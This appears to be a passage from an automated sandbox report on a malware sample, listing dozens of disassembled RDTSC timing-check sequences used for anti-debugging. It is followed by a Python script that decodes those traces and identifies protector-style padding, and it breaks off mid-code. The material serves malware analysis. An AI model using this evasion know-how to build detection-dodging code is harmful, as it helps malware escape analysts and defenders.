                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B98 second address: 727B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727D0D second address: 727D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727D11 second address: 727D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728963 second address: 728986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FBF78E7B35Dh 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728986 second address: 728990 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF78ADB276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728990 second address: 7289A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF78E7B35Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729018 second address: 72901E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72901E second address: 729044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FBF78E7B35Eh 0x0000000a jl 00007FBF78E7B37Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF78E7B35Bh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729044 second address: 729048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726FDA second address: 726FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726FE0 second address: 726FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF78ADB27Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D6A second address: 730D93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B363h 0x00000007 jne 00007FBF78E7B356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FBF78E7B35Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D93 second address: 730D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D97 second address: 730DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78E7B35Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7309FE second address: 730A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730A02 second address: 730A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B365h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730A1D second address: 730A3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FBF78ADB276h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FBF78ADB27Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7407EA second address: 7407EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740980 second address: 740984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740984 second address: 740988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740988 second address: 74098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74098E second address: 7409A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B365h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409A8 second address: 7409B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747908 second address: 74790C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74790C second address: 747919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747919 second address: 74791F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74791F second address: 747934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB281h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748FA7 second address: 748FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748FB5 second address: 748FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF78ADB276h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748FBF second address: 748FE9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBF78E7B367h 0x00000010 jnl 00007FBF78E7B356h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758DAE second address: 758DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Bh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBF78ADB282h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757AD3 second address: 757AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FBF78E7B356h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757AEB second address: 757AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757AEF second address: 757B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B366h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FBF78E7B35Eh 0x00000011 js 00007FBF78E7B356h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757B21 second address: 757B2B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78ADB276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757B2B second address: 757B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FBF78E7B356h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757B3B second address: 757B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757DF2 second address: 757E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBF78E7B367h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B66C second address: 75B670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B670 second address: 75B682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B682 second address: 75B686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B686 second address: 75B68E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B68E second address: 75B698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FBF78ADB276h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1B1 second address: 75B1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1B5 second address: 75B1DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Fh 0x00000007 jnp 00007FBF78ADB276h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FBF78ADB27Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1DC second address: 75B1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1E4 second address: 75B1F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B3CC second address: 75B3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7642F6 second address: 7642FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7642FA second address: 76431A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBF78E7B360h 0x00000008 jo 00007FBF78E7B356h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76431A second address: 76431E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76431E second address: 764322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764322 second address: 764328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764180 second address: 764184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778202 second address: 77821E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF78ADB280h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77821E second address: 778222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778222 second address: 778226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779CFD second address: 779D25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBF78E7B360h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FBF78E7B35Bh 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D25 second address: 779D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D2B second address: 779D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D12B second address: 77D130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D130 second address: 77D13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78E7B356h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D13C second address: 77D159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB281h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6783F2 second address: 6783FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6783FA second address: 6783FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6783FE second address: 678408 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78E7B356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78ABE3 second address: 78AC05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FBF78ADB276h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF78ADB282h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AC05 second address: 78AC0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AD5E second address: 78AD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AD64 second address: 78AD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AD68 second address: 78AD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AFEE second address: 78AFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FBF78E7B356h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B166 second address: 78B183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB289h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B183 second address: 78B1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FBF78E7B369h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF78E7B366h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B1CE second address: 78B20D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF78ADB284h 0x00000012 jmp 00007FBF78ADB289h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B20D second address: 78B211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B489 second address: 78B48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CE82 second address: 78CE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F9CB second address: 78F9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F9CF second address: 78F9D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791421 second address: 791425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791425 second address: 791453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF78E7B369h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF78E7B35Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791453 second address: 79146C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jne 00007FBF78ADB278h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79146C second address: 791476 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF78E7B356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF031C second address: 4DF0374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Fh 0x00000008 pushfd 0x00000009 jmp 00007FBF78ADB288h 0x0000000e sub esi, 130140D8h 0x00000014 jmp 00007FBF78ADB27Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF78ADB285h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0374 second address: 4DF037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF037A second address: 4DF03C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB283h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 push ecx 0x00000011 mov bl, B5h 0x00000013 pop esi 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movsx ebx, si 0x0000001a mov eax, 01397A9Dh 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FBF78ADB282h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03C0 second address: 4DF03C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03C6 second address: 4DF03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03CC second address: 4DF03D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04AC second address: 4DF04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
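Each interceptor entry above is one pair of rdtsc reads, with the instructions executed between them listed at their offset in the executed byte stream. The decoder below is an added example, not part of the report or of the sample: it parses those lines and separates the bytes that were actually executed from the bytes that jmp/jcc instructions stepped over, so the padding structure of the timing check becomes visible (stack-neutral push/pop pairs, conditional branches with a zero displacement that can only fall through, and unconditional jmps over dead bytes). That shape is what a protector-generated stub produces and is consistent with the Oreans/WinLicense strings found in memory further down. Two assumptions are inferred from this page rather than documented anywhere: the sandbox renders every branch as if it sat at 0x7FBF78ADB270 or 0x7FBF78E7B350, and the per-instruction offsets count executed bytes, which is why a taken jump still leaves the offsets contiguous.

```python
import re
from dataclasses import dataclass

# Assumption inferred from the branch targets in this report: the sandbox disassembles
# every branch as if it were located at one of these addresses, so a 6-byte jcc whose
# target is base+6 (or a 5-byte jmp whose target is base+5) has a displacement of zero
# and merely falls through to the next instruction.
DISPLAY_BASES = (0x7FBF78ADB270, 0x7FBF78E7B350)

HEADER_RE = re.compile(
    r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
    r"\s+instructions:\s*(.*)$")
# One "0xOFFSET mnemonic operands" token; the offset is the position inside the
# executed byte stream, so taken jumps still produce contiguous offsets.
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|$)")


@dataclass
class RdtscPair:
    first: int
    second: int
    insns: list       # (offset, mnemonic, operand) for every executed instruction
    jmp_skips: list   # bytes each unconditional jmp stepped over (dead code)
    jcc_rels: list    # displacement of each conditional branch; 0 = opaque fall-through

    @property
    def gap(self):            # address distance between the two rdtsc reads
        return self.second - self.first

    @property
    def executed(self):       # bytes actually executed before the second rdtsc
        return self.insns[-1][0]

    @property
    def dead_bytes(self):     # bytes inside the gap that were jumped over
        return self.gap - self.executed

    def consistent(self):
        # jmps always skip their displacement; a jcc with a non-zero displacement may
        # or may not be taken, so the dead-byte count must lie between the two sums.
        lo = sum(self.jmp_skips)
        return lo <= self.dead_bytes <= lo + sum(self.jcc_rels)


def parse_pair(line):
    m = HEADER_RE.search(line)
    if not m:
        raise ValueError("not an RDTSC interceptor line")
    first, second = int(m.group(1), 16), int(m.group(2), 16)
    insns = []
    for off, text in INSN_RE.findall(m.group(3)):
        mnem, _, opnd = text.partition(" ")
        insns.append((int(off, 16), mnem, opnd.strip()))
    if len(insns) < 2 or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        raise ValueError("trace must start and end with rdtsc")
    jmp_skips, jcc_rels = [], []
    for i, (off, mnem, opnd) in enumerate(insns[:-1]):
        if not mnem.startswith("j"):
            continue
        target = int(opnd.rstrip("hH"), 16)
        size = insns[i + 1][0] - off              # encoded length from the next offset
        base = max(b for b in DISPLAY_BASES if b <= target)
        rel = target - (base + size)
        (jmp_skips if mnem == "jmp" else jcc_rels).append(rel)
    return RdtscPair(first, second, insns, jmp_skips, jcc_rels)


def summarize(lines):
    """Decode every interceptor line and return one summary dict per rdtsc pair."""
    out = []
    for line in lines:
        p = parse_pair(line)
        out.append({
            "first": p.first, "gap": p.gap, "executed": p.executed,
            "dead_bytes": p.dead_bytes, "jmps": len(p.jmp_skips),
            "opaque_jcc": sum(1 for r in p.jcc_rels if r == 0),
            "consistent": p.consistent(),
        })
    return out


# Four interceptor lines copied verbatim from this report.
SAMPLE_LINES = [
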